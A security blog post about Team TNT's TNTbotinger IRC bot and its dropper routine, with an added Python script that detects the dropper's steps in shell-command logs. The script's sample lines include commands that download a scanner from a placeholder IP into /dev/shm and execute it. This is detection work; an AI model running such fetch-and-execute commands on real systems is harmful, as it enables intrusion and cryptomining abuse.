The criminal outfit known for its cryptomining operations, Team TNT, has enhanced its arsenal with new tools with sharpened capabilities. A new bot named TNTbotinger has been observed in the threat group's recent attacks.
The threat group has developed its own Internet Relay Chat (IRC) bot, called TNTbotinger, which can be used to perform DDoS attacks.
- To launch an attack using TNTbotinger, the attackers must first achieve remote code execution on their initial target machine, via misconfiguration issues, reused or weak passwords, leaked credentials, or unpatched vulnerabilities.
- Once inside, the bot looks for vulnerable instances on the network and performs remote code execution on them.
How does the attack work?
- The attack begins with a malicious shell script that executes on the victim machine. The script checks whether the file /dev/shm/[.]alsp is present; if the file is absent, it proceeds with its routine.
- The script then attempts to install the curl, bash, wget, gcc, make, and pnscan packages. The installation is written to cover both Linux and Debian-based systems.
- The script next tries to download and execute multiple binaries, such as pnscan, a port-scanning tool. If the tool is not already present in the directory, it can be downloaded manually.
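The dropper behaviour described in the three steps above (marker-file check, package installation, download and execution of binaries from /dev/shm) gives a defender concrete indicators to look for. The following Python script is an added example, not code from the post or from the malware: it runs a small set of detection rules over shell-command log lines (one command per line, as a shell history or a reconstructed audit record would give) and reports which indicators fired. The sample log lines, the IP address and the package-manager syntax are constructed for illustration; the marker path is the one the post names, with the defanging brackets removed.

```python
"""Detection rules for the TNTbotinger dropper behaviour described in the post.

Added example (not the post's or the malware's code). Input is assumed to be
one shell command per line, e.g. from a shell history file or an auditd EXECVE
record flattened back into a command line.
"""
import os
import re
from dataclasses import dataclass

# Marker file the dropper checks before running (from the post, de-fanged).
MARKER_FILE = "/dev/shm/.alsp"

# Packages the post says the script installs.
DROPPER_PKGS = {"curl", "bash", "wget", "gcc", "make", "pnscan"}

# Package-manager install commands (apt/yum/dnf syntax assumed for the example).
PKG_INSTALL_RE = re.compile(r"\b(apt(-get)?|yum|dnf)\s+(-y\s+)?install\b")
# curl/wget fetching a URL.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b.*\bhttps?://\S+")
# A path under /dev/shm used as the command itself (start of line, after a
# shell separator, or after a wrapper such as nohup/bash/sh), i.e. executed.
SHM_EXEC_RE = re.compile(r"(?:^|[;&|]\s*|nohup\s+|bash\s+|sh\s+)/dev/shm/\S+")


@dataclass
class Finding:
    rule: str
    line: str


def scan_log_lines(lines):
    """Apply each rule to every line and return the findings in input order."""
    findings = []
    for raw in lines:
        cmd = raw.strip()
        if not cmd:
            continue
        # Rule 1: any reference to the dropper's marker file.
        if MARKER_FILE in cmd:
            findings.append(Finding("marker_file_reference", cmd))
        # Rule 2: a package install that requests the dropper's tool set.
        m = PKG_INSTALL_RE.search(cmd)
        if m:
            requested = set(re.findall(r"[a-z][a-z0-9.+-]*", cmd[m.end():]))
            hit = requested & DROPPER_PKGS
            if "pnscan" in hit or len(hit) >= 3:
                findings.append(Finding("dropper_package_set", cmd))
        # Rule 3: a download whose destination is /dev/shm.
        if DOWNLOAD_RE.search(cmd) and "/dev/shm/" in cmd:
            findings.append(Finding("download_to_shm", cmd))
        # Rule 4: something under /dev/shm being executed.
        if SHM_EXEC_RE.search(cmd):
            findings.append(Finding("exec_from_shm", cmd))
    return findings


def rules_hit(lines):
    """Sorted list of distinct rule names that fired on the given lines."""
    return sorted({f.rule for f in scan_log_lines(lines)})


def marker_present(root="/"):
    """True if the marker file exists; `root` lets the check run against a copied
    filesystem or a test directory instead of the live host."""
    return os.path.exists(os.path.join(root, MARKER_FILE.lstrip("/")))


# Constructed sample log lines: four dropper-like commands and three benign ones.
SAMPLE_LINES = [
    "[ -f /dev/shm/.alsp ] || touch /dev/shm/.alsp",
    "apt-get install -y curl bash wget gcc make pnscan",
    "wget -q http://198.51.100.23/pnscan -O /dev/shm/pnscan",  # placeholder IP
    "chmod +x /dev/shm/pnscan && /dev/shm/pnscan",
    "apt-get install -y vim",
    "curl -s https://example.com/index.html -o /tmp/index.html",
    "ls -la /home/deploy",
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LINES):
        print(f"{f.rule:24s} {f.line}")
    print("marker file on this host:", marker_present())
```

Each rule maps to one of the steps in the post, so a hit on several of them in a short window is a much stronger signal than any one alone; the benign lines show that a single package install or an ordinary download does not trigger anything. The `root` parameter on `marker_present` is there so the same check can be pointed at a mounted disk image during an investigation.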
Recent wave of attacks –
- The group's trojan, which targets cloud servers to mine cryptocurrency via third-party software, was recently updated.
- Earlier, the group used a malware named Black-T to target AWS credential files for mining the Monero cryptocurrency.
The threat actor group has shown how vulnerable even state-of-the-art cloud services are to malicious actors with such threats in their arsenal. To defend against these threats, our internal experts suggest proactively implementing policies for continuous monitoring and auditing of devices, following the principle of least privilege, regularly patching and updating systems, and using strong passwords.
To read more, please check eScan Blog